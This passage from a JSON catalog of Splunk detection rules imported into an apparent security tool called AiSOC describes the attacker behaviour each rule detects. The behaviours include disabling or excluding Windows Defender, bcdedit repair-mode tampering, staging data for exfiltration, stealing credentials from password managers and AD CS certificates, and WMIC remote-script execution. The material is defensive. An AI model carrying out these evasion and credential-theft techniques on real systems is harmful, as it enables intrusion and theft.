for malicious purposes, such as data exfiltration, malware distribution, or establishing persistence. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, service disruption, or malware introduction. Immediate investigation is required to determine the intent and mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/create-or-delete-windows-shares-using-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "743a322c-9a68-4a0f-9c17-85d9cce2a27c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml" } }, { "id": "splunk-security-content-747d7800-2eaa-422d-b994-04d8bb9e06d0", "type": "detection", "name": "Windows Steal Authentication Certificates Certificate Request", "description": "The following analytic detects when a new certificate is requested from Certificate Services - AD CS. It leverages Event ID 4886, which indicates that a certificate request has been received. This activity is significant because unauthorized certificate requests can be part of credential theft or lateral movement tactics. If confirmed malicious, an attacker could use the certificate to impersonate users, gain unauthorized access to resources, or establish persistent access within the environment. Monitoring and correlating this event with other suspicious activities is crucial for identifying potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-certificate-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "747d7800-2eaa-422d-b994-04d8bb9e06d0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_certificate_request.yml" } }, { "id": "splunk-security-content-74a8133f-93e7-4b71-9bd3-13a66124fd57", "type": "detection", "name": "Windows System LogOff Commandline", "description": "The following analytic detects the execution of the Windows command line to log off a host machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes involving `shutdown.exe` with specific parameters. This activity is significant as it is often associated with Advanced Persistent Threats (APTs) and Remote Access Trojans (RATs) like dcrat, which use this technique to disrupt operations, aid in system destruction, or inhibit recovery. If confirmed malicious, this could lead to system downtime, data loss, or hindered incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-logoff-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "74a8133f-93e7-4b71-9bd3-13a66124fd57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_logoff_commandline.yml" } }, { "id": "splunk-security-content-74c5a3b0-27a7-463c-9d00-1a5bb12cb7b5", "type": "detection", "name": "Windows Archive Collected Data via Powershell", "description": "The following analytic detects the use of PowerShell scripts to archive files into a temporary folder. It leverages PowerShell Script Block Logging, specifically monitoring for the `Compress-Archive` command targeting the `Temp` directory. This activity is significant as it may indicate an adversary's attempt to collect and compress data for exfiltration. If confirmed malicious, this behavior could lead to unauthorized data access and exfiltration, posing a severe risk to sensitive information and overall network security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-archive-collected-data-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "74c5a3b0-27a7-463c-9d00-1a5bb12cb7b5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_archive_collected_data_via_powershell.yml" } }, { "id": "splunk-security-content-7567a72f-bada-489d-aef1-59743fb64a66", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Signature Retirement", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender Signature Retirement. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the DisableSignatureRetirement registry setting. This activity is significant because disabling signature retirement can prevent Windows Defender from removing outdated antivirus signatures, potentially reducing its effectiveness in detecting threats. If confirmed malicious, this action could allow an attacker to evade detection by using older, less relevant signatures, thereby compromising the system's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-signature-retirement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7567a72f-bada-489d-aef1-59743fb64a66", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml" } }, { "id": "splunk-security-content-75b00fd8-a0ff-11eb-8b31-acde48001122", "type": "detection", "name": "Schedule Task with Rundll32 Command Trigger", "description": "The following analytic detects the creation of scheduled tasks in Windows that use the rundll32 command. It leverages Windows Security EventCode 4698, which logs the creation of scheduled tasks, and filters for tasks executed via rundll32. This activity is significant as it is a common technique used by malware, such as TrickBot, to persist in an environment or deliver additional payloads. If confirmed malicious, this could lead to data theft, ransomware deployment, or other damaging outcomes. Immediate investigation and mitigation are crucial to prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schedule-task-with-rundll32-command-trigger.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "75b00fd8-a0ff-11eb-8b31-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schedule_task_with_rundll32_command_trigger.yml" } }, { "id": "splunk-security-content-75dfd9f4-ca64-45d0-9422-4bde6d26a59e", "type": "detection", "name": "CrushFTP Max Simultaneous Users From IP", "description": "The following analytic identifies instances where CrushFTP has blocked access due to exceeding the maximum number of simultaneous connections from a single IP address. This activity may indicate brute force attempts, credential stuffing, or automated attacks against the CrushFTP server. This detection is particularly relevant following the discovery of CVE-2025-31161, an authentication bypass vulnerability in CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crushftp-max-simultaneous-users-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "75dfd9f4-ca64-45d0-9422-4bde6d26a59e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/crushftp_max_simultaneous_users_from_ip.yml" } }, { "id": "splunk-security-content-76406a0f-f5e0-4167-8e1f-337fdc0f1b0c", "type": "detection", "name": "Windows Impair Defenses Disable Win Defender Auto Logging", "description": "The following analytic detects the disabling of Windows Defender logging by identifying changes to the Registry keys DefenderApiLogger or DefenderAuditLogger set to disable. It leverages data from the Endpoint.Registry datamodel to monitor specific registry paths and values. This activity is significant as it is commonly associated with Remote Access Trojan (RAT) malware attempting to evade detection. If confirmed malicious, this action could allow an attacker to conceal their activities, making it harder to detect further malicious actions and maintain persistence on the compromised endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-win-defender-auto-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76406a0f-f5e0-4167-8e1f-337fdc0f1b0c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml" } }, { "id": "splunk-security-content-76753bab-f116-4ea3-8fb9-89b638be58a9", "type": "detection", "name": "Windows Ingress Tool Transfer Using Explorer", "description": "The following analytic identifies instances where the Windows Explorer process (explorer.exe) is executed with a URL in its command line. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because adversaries, such as those using DCRat malware, may abuse explorer.exe to open URLs with the default browser, which is an uncommon and suspicious behavior. If confirmed malicious, this technique could allow attackers to download and execute malicious payloads, leading to potential system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ingress-tool-transfer-using-explorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76753bab-f116-4ea3-8fb9-89b638be58a9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml" } }, { "id": "splunk-security-content-7698b945-238e-4bb9-b172-81f5ca1685a1", "type": "detection", "name": "O365 Email Reported By User Found Malicious", "description": "The following analytic detects when an email submitted to Microsoft using the built-in report button in Outlook is found to be malicious. This capability is an enhanced protection feature that can be used within o365 tenants by users to report potentially malicious emails. This correlation looks for any submission that returns a Phish or Malware verdict upon submission.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-reported-by-user-found-malicious.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7698b945-238e-4bb9-b172-81f5ca1685a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_reported_by_user_found_malicious.yml" } }, { "id": "splunk-security-content-76ac2dcb-333c-4a77-8ae9-2720cfae47a8", "type": "detection", "name": "Citrix ADC Exploitation CVE-2023-3519", "description": "The following analytic identifies potential exploitation attempts against Citrix ADC related to CVE-2023-3519. It detects POST requests to specific web endpoints associated with this vulnerability by leveraging the Web datamodel.\nThis activity is significant as CVE-2023-3519 involves a SAML processing overflow issue that can lead to memory corruption, posing a high risk.\nIf confirmed malicious, attackers could exploit this to execute arbitrary code, escalate privileges, or disrupt services, making it crucial for SOC analysts to monitor and investigate these alerts promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-adc-exploitation-cve-2023-3519.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76ac2dcb-333c-4a77-8ae9-2720cfae47a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_adc_exploitation_cve_2023_3519.yml" } }, { "id": "splunk-security-content-76d6573f-c4ab-4fa1-8390-c036416d4add", "type": "detection", "name": "Linux Auditd Auditd Daemon Abort", "description": "The following analytic detects the abnormal termination of the Linux audit daemon (auditd) by identifying DAEMON_ABORT events in audit logs. These terminations suggest a serious failure of the auditing subsystem, potentially due to resource exhaustion, corruption, or malicious interference. Unlike a clean shutdown, DAEMON_ABORT implies that audit logging may have been disabled without system administrator intent. Alerts should be generated on detection and correlated with DAEMON_START, DAEMON_END, and system logs to determine root cause. If no DAEMON_START follows soon after, or this pattern repeats, it indicates a high-severity issue that impacts log integrity and should be immediately investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-daemon-abort.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76d6573f-c4ab-4fa1-8390-c036416d4add", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_daemon_abort.yml" } }, { "id": "splunk-security-content-76ea28ac-6f10-43fd-b5fe-340022ad0fd3", "type": "detection", "name": "Windows WSUS Spawning Shell", "description": "The following analytic identifies instances where a shell (PowerShell.exe or Cmd.exe) is spawned from wsusservice.exe, the Windows Server Update Services process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the parent process is wsusservice.exe. This activity is significant as it may indicate exploitation of CVE-2025-59287, a critical deserialization vulnerability in WSUS that allows unauthenticated remote code execution. If confirmed malicious, this behavior could allow attackers to execute arbitrary commands on WSUS servers, potentially leading to system compromise, data exfiltration, domain enumeration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wsus-spawning-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76ea28ac-6f10-43fd-b5fe-340022ad0fd3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wsus_spawning_shell.yml" } }, { "id": "splunk-security-content-773b66fe-4dd9-11ec-8289-acde48001122", "type": "detection", "name": "Add or Set Windows Defender Exclusion", "description": "The following analytic detects the use of commands to add or set exclusions\nin Windows Defender. It leverages data from Endpoint Detection and Response (EDR)\nagents, focusing on command-line executions involving \"Add-MpPreference\" or \"Set-MpPreference\"\nwith exclusion parameters. This activity is significant because adversaries often\nuse it to bypass Windows Defender, allowing malicious code to execute undetected.\nIf confirmed malicious, this behavior could enable attackers to evade antivirus\ndetection, maintain persistence, and execute further malicious activities without\ninterference from Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/add-or-set-windows-defender-exclusion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "773b66fe-4dd9-11ec-8289-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/add_or_set_windows_defender_exclusion.yml" } }, { "id": "splunk-security-content-7742987e-88c1-476b-a626-a869e088ab72", "type": "detection", "name": "Windows User Discovery Via Net", "description": "The following analytic detects the execution of `net.exe` or `net1.exe` with command-line arguments `user` or `users` to query local user accounts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate local users, which is a common step in situational awareness and Active Directory discovery. If confirmed malicious, this behavior could lead to further attacks, including privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-discovery-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7742987e-88c1-476b-a626-a869e088ab72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_discovery_via_net.yml" } }, { "id": "splunk-security-content-7742aa92-c9d9-11eb-bbfc-acde48001122", "type": "detection", "name": "Prevent Automatic Repair Mode using Bcdedit", "description": "The following analytic detects the execution of \"bcdedit.exe\" with parameters to set the boot status policy to ignore all failures. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it can indicate an attempt by ransomware to prevent a compromised machine from booting into automatic repair mode, thereby hindering recovery efforts. If confirmed malicious, this action could allow attackers to maintain control over the infected system, complicating remediation and potentially leading to further damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/prevent-automatic-repair-mode-using-bcdedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7742aa92-c9d9-11eb-bbfc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml" } }, { "id": "splunk-security-content-77592bec-d5cc-11eb-9e60-acde48001122", "type": "detection", "name": "Excessive number of service control start as disabled", "description": "The following analytic detects an excessive number of `sc.exe` processes launched with the command line argument `start= disabled` within a short period. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and process GUIDs. This activity is significant as it may indicate an attempt to disable critical services, potentially impairing system defenses. If confirmed malicious, this behavior could allow an attacker to disrupt security mechanisms, hinder incident response, and maintain control over the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-number-of-service-control-start-as-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "77592bec-d5cc-11eb-9e60-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml" } }, { "id": "splunk-security-content-77f41d9e-b8be-47e3-ab35-5776f5ec1d20", "type": "detection", "name": "User Discovery With Env Vars PowerShell Script Block", "description": "The following analytic detects the use of PowerShell environment variables to identify the current logged user by leveraging PowerShell Script Block Logging (EventCode=4104). This method monitors script blocks containing `$env:UserName` or `[System.Environment]::UserName`. Identifying this activity is significant as adversaries and Red Teams may use it for situational awareness and Active Directory discovery on compromised endpoints. If confirmed malicious, this activity could allow attackers to gain insights into user context, aiding in further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/user-discovery-with-env-vars-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "77f41d9e-b8be-47e3-ab35-5776f5ec1d20", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/user_discovery_with_env_vars_powershell_script_block.yml" } }, { "id": "splunk-security-content-783f0798-f679-4c17-b3b3-187febf0b9b8", "type": "detection", "name": "Windows Impair Defense Change Win Defender Quick Scan Interval", "description": "The following analytic detects modifications to the Windows registry that change the Windows Defender Quick Scan Interval. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"QuickScanInterval\" registry path. This activity is significant because altering the scan interval can impair Windows Defender's ability to detect malware promptly, potentially allowing threats to persist undetected. If confirmed malicious, this modification could enable attackers to bypass security measures, maintain persistence, and execute further malicious activities without being detected by quick scans.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-quick-scan-interval.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "783f0798-f679-4c17-b3b3-187febf0b9b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml" } }, { "id": "splunk-security-content-784241aa-85a5-4782-a503-d071bd3446f9", "type": "detection", "name": "Linux Auditd Find Credentials From Password Managers", "description": "The following analytic detects suspicious attempts to find credentials stored in password managers, which may indicate an attacker's effort to retrieve sensitive login information. Password managers are often targeted by adversaries seeking to access stored passwords for further compromise or lateral movement within a network. By monitoring for unusual or unauthorized access to password manager files or processes, this analytic helps identify potential credential theft attempts, enabling security teams to respond quickly to protect critical accounts and prevent further unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-find-credentials-from-password-managers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "784241aa-85a5-4782-a503-d071bd3446f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_find_credentials_from_password_managers.yml" } }, { "id": "splunk-security-content-785bbfb5-d404-42d1-ab9d-45c37a2c75cd", "type": "detection", "name": "Windows MMC Loaded Script Engine DLL", "description": "The following analytic identifies when a Windows process loads scripting libraries like jscript.dll or vbscript.dll to execute script code on a target system. While these DLLs are legitimate parts of the operating system, their use by unexpected processes or in unusual contexts can indicate malicious activity, such as script-based malware, living-off-the-land techniques, or automated attacks. This detection monitors which processes load these libraries, along with their command-line arguments and parent processes, to help distinguish normal administrative behavior from potential threats. Alerts should be investigated with attention to the process context and any subsequent network or system activity, as legitimate tools like MMC snap-ins may also trigger this behavior under routine administrative tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mmc-loaded-script-engine-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "785bbfb5-d404-42d1-ab9d-45c37a2c75cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mmc_loaded_script_engine_dll.yml" } }, { "id": "splunk-security-content-787dd1c1-eb3a-4a31-8e8c-2ad24b214bc8", "type": "detection", "name": "GitHub Enterprise Disable Dependabot", "description": "The following analytic detects when a user disables Dependabot security features within a GitHub repository. Dependabot helps automatically identify and fix security vulnerabilities in dependencies. The detection monitors GitHub Enterprise logs for configuration changes that disable Dependabot functionality. This behavior could indicate an attacker attempting to prevent the automatic detection of vulnerable dependencies, which would allow them to exploit known vulnerabilities that would otherwise be patched. For a SOC, identifying the disabling of security features like Dependabot is critical as it may be a precursor to supply chain attacks where attackers exploit vulnerable dependencies. The impact could be severe if vulnerabilities remain unpatched, potentially leading to code execution, data theft, or other compromises through the software supply chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-dependabot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "787dd1c1-eb3a-4a31-8e8c-2ad24b214bc8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_dependabot.yml" } }, { "id": "splunk-security-content-787e9dd0-4328-11ec-a029-acde48001122", "type": "detection", "name": "WMIC XSL Execution via URL", "description": "The following analytic detects `wmic.exe` loading a remote XSL script\nvia a URL. This detection leverages Endpoint Detection and Response (EDR) data,\nfocusing on command-line executions that include HTTP/HTTPS URLs and the /FORMAT\nswitch. This activity is significant as it indicates a potential application control\nbypass, allowing adversaries to execute JScript or VBScript within an XSL file.\nIf confirmed malicious, this technique can enable attackers to execute arbitrary\ncode, escalate privileges, or maintain persistence using a trusted Windows tool,\nposing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmic-xsl-execution-via-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "787e9dd0-4328-11ec-a029-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmic_xsl_execution_via_url.yml" } }, { "id": "splunk-security-content-78e678d2-bf64-4fe6-aa52-2f7b11dddee7", "type": "detection", "name": "Windows Detect Network Scanner Behavior", "description": "The following analytic detects when an application is used to connect a large number of unique ports/targets within a short time frame. Network enumeration may be used by adversaries as a method of discovery, lateral movement, or remote execution. This analytic may require significant tuning depending on the organization and applications being actively used, highly recommended to pre-populate the filter macro prior to activation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595.001", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-detect-network-scanner-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "78e678d2-bf64-4fe6-aa52-2f7b11dddee7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_detect_network_scanner_behavior.yml" } }, { "id": "splunk-security-content-78f7487d-42ce-4f7f-8685-2159b25fb477", "type": "detection", "name": "Linux Octave Privilege Escalation", "description": "The following analytic detects the execution of GNU Octave 